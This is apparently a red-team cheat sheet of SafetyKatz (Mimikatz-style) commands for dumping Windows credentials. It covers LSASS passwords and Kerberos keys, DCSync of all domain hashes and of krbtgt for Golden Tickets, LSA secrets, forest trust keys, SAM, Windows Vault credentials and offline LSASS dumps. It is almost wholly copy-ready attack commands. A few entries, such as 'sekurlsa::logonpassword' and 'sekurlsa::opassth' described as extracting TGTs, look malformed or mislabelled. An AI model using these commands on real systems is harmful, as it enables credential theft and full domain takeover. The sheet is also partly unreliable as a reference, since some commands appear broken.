# dumping-credentials

> \[!INFO] Remember to follow the binaries methodology

## SafetyKatz

**Extracts Kerberos encryption keys (AES/NTLM) from LSASS:**

```batchfile
SafetyKatz.exe "sekurlsa::ekeys" "exit"
```

**Alternative to `ekeys` for Kerberos keys extraction:**

```batchfile
SafetyKatz.exe "sekurlsa::keys" "exit"
```

**Performs DCSync to pull all domain user hashes (requires DA rights):**

```batchfile
SafetyKatz.exe "lsadump::dcsync" "exit"
```

**DCSync for a specific user (e.g., krbtgt for Golden Tickets):**

```batchfile
SafetyKatz.exe "lsadump::dcsync /user:DOMAIN\krbtgt" "exit"
```

**Dumps plaintext passwords and NTLM hashes from LSASS:**

```batchfile
SafetyKatz.exe "sekurlsa::logonpassword" "exit"
```

**Retrieves LSA secrets (cached domain creds, service accounts):**

```batchfile
SafetyKatz.exe "lsadump::lsa /patch" "exit"
```

**Extracts domain trust keys (for Golden Ticket attacks across forests):**

```batchfile
SafetyKatz.exe "lsadump::trust" "exit"
```

**Dumps local SAM database (non-domain user hashes):**

```batchfile
SafetyKatz.exe "lsadump::sam" "exit"
```

**Lists saved credentials in Windows Vault (e.g., RDP/Wi-Fi passwords):**

```batchfile
SafetyKatz.exe "vault::list" "exit"
```

**Decrypts and extracts Windows Vault credentials:**

```batchfile
SafetyKatz.exe "vault::cred /patch" "exit"
```

**Parses an LSASS memory dump (offline credential extraction):**

```batchfile
SafetyKatz.exe "sekurlsa::minidump lsass.dmp" "exit"
```

**Extracts Kerberos TGTs for Pass-the-Ticket attacks:**

```batchfile
SafetyKatz.exe "sekurlsa::opassth" "exit"
```